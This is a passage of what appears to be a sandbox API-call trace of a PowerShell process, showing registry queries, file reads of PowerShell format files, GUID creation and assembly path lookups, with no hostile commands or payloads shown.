lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0252.230] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cd88 | out: phkResult=0x16cd88*=0x310) returned 0x0 [0252.230] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cd0c, lpData=0x0, lpcbData=0x16cd08*=0x0 | out: lpType=0x16cd0c*=0x1, lpData=0x0, lpcbData=0x16cd08*=0x56) returned 0x0 [0252.230] CoTaskMemAlloc (cb=0x5a) returned 0x37a1a0 [0252.230] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x37a1a0, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0252.230] CoTaskMemFree (pv=0x37a1a0) [0252.230] RegCloseKey (hKey=0x310) returned 0x0 [0252.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0252.234] VirtualQuery (in: lpAddress=0x16b820, lpBuffer=0x16c6e0, dwLength=0x30 | out: lpBuffer=0x16c6e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.235] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xc9cd19af, Data2=0x5706, Data3=0x4338, Data4=([0]=0x85, [1]=0x35, [2]=0xcc, [3]=0x3c, [4]=0x82, [5]=0x46, [6]=0xff, [7]=0x40))) returned 0x0 [0252.235] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.236] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x82d7907a, Data2=0xc9f8, Data3=0x4465, Data4=([0]=0x9e, [1]=0x23, [2]=0xe1, [3]=0x31, [4]=0x7, [5]=0xc8, [6]=0x6d, [7]=0x29))) returned 0x0 [0252.236] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf3ae7420, Data2=0x619f, Data3=0x4d45, Data4=([0]=0xab, [1]=0x85, [2]=0x83, [3]=0x48, [4]=0xe7, [5]=0xc, [6]=0x57, [7]=0x5c))) returned 0x0 [0252.237] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x89302736, Data2=0xa6a7, Data3=0x49c9, Data4=([0]=0xad, [1]=0x67, [2]=0x7b, [3]=0x2b, [4]=0xff, [5]=0x1d, [6]=0x57, [7]=0xed))) returned 0x0 [0252.237] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.238] VirtualQuery (in: lpAddress=0x16b960, lpBuffer=0x16c820, dwLength=0x30 | out: lpBuffer=0x16c820*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0252.238] SetErrorMode (uMode=0x1) returned 0x1 [0252.239] SetErrorMode (uMode=0x1) returned 0x1 [0252.239] GetFileType (hFile=0x310) returned 0x1 [0252.239] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.245] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.248] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.249] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.250] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.250] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.250] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.250] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.251] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.252] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.252] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.252] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.252] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.253] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.253] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.255] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.256] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.257] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.257] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.257] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.257] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.258] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.258] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.258] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.258] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.259] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.259] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.259] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.259] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.260] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.260] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.260] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.263] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.263] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.263] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.263] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.264] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.264] ReadFile (in: hFile=0x310, lpBuffer=0x37f0168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ccf8, lpOverlapped=0x0 | out: lpBuffer=0x37f0168*, lpNumberOfBytesRead=0x16ccf8*=0x1000, lpOverlapped=0x0) returned 1 [0252.267] SetErrorMode (uMode=0x1) returned 0x1 [0252.268] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cca0 | out: lpFileInformation=0x16cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0252.268] SetErrorMode (uMode=0x1) returned 0x1 [0252.268] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0252.269] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cd88 | out: phkResult=0x16cd88*=0x310) returned 0x0 [0252.269] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cd0c, lpData=0x0, lpcbData=0x16cd08*=0x0 | out: lpType=0x16cd0c*=0x1, lpData=0x0, lpcbData=0x16cd08*=0x56) returned 0x0 [0252.269] CoTaskMemAlloc (cb=0x5a) returned 0x37a1a0 [0252.269] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16ccdc, lpData=0x37a1a0, lpcbData=0x16ccd8*=0x56 | out: lpType=0x16ccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ccd8*=0x56) returned 0x0 [0252.269] CoTaskMemFree (pv=0x37a1a0) [0252.269] RegCloseKey (hKey=0x310) returned 0x0 [0252.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0252.284] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xf7219058, Data2=0xa03c, Data3=0x43e4, Data4=([0]=0x96, [1]=0x19, [2]=0x8e, [3]=0x0, [4]=0x67, [5]=0x84, [6]=0x65, [7]=0x85))) returned 0x0 [0252.285] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x8da99b71, Data2=0xaffc, Data3=0x41cd, Data4=([0]=0x95, [1]=0xc5, [2]=0xf9, [3]=0x41, [4]=0x27, [5]=0xc8, [6]=0x5a, [7]=0x6))) returned 0x0 [0253.063] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x79f99ad7, Data2=0x96c2, Data3=0x45d4, Data4=([0]=0x8a, [1]=0x7f, [2]=0x89, [3]=0xaf, [4]=0xde, [5]=0x2d, [6]=0xfe, [7]=0x31))) returned 0x0 [0253.069] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x2cffa028, Data2=0x888f, Data3=0x4354, Data4=([0]=0x87, [1]=0xc2, [2]=0x42, [3]=0xdd, [4]=0x0, [5]=0x1b, [6]=0x43, [7]=0x5c))) returned 0x0 [0253.075] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x862306d8, Data2=0x20ff, Data3=0x4a6a, Data4=([0]=0x81, [1]=0x6b, [2]=0x96, [3]=0xd9, [4]=0xa0, [5]=0x44, [6]=0x25, [7]=0x8b))) returned 0x0 [0253.077] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xa307dc1, Data2=0x823b, Data3=0x4110, Data4=([0]=0x98, [1]=0xb3, [2]=0xb9, [3]=0x70, [4]=0xa1, [5]=0xe0, [6]=0x5, [7]=0x7))) returned 0x0 [0253.087] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xb5e29632, Data2=0xf8bb, Data3=0x4880, Data4=([0]=0x92, [1]=0x6d, [2]=0x6, [3]=0xff, [4]=0x4f, [5]=0x7b, [6]=0x9b, [7]=0x2))) returned 0x0 [0253.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.158] VirtualQuery (in: lpAddress=0x16b270, lpBuffer=0x16c130, dwLength=0x30 | out: lpBuffer=0x16c130*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30 [0253.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.161] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0x1f08ecc7, Data2=0xbf4c, Data3=0x4f9b, Data4=([0]=0xa0, [1]=0x32, [2]=0x8b, [3]=0x2c, [4]=0xb2, [5]=0x7c, [6]=0x40, [7]=0x9))) returned 0x0 [0253.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.163] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.164] CoCreateGuid (in: pguid=0x16cfb0 | out: pguid=0x16cfb0*(Data1=0xba0fe393, Data2=0xa222, Data3=0x46ab, Data4=([0]=0x94, [1]=0xad, [2]=0x6d, [3]=0xef, [4]=0xca, [5]=0x4c, [6]=0x60, [7]=0xaf))) returned 0x0 [0253.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0253.165] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 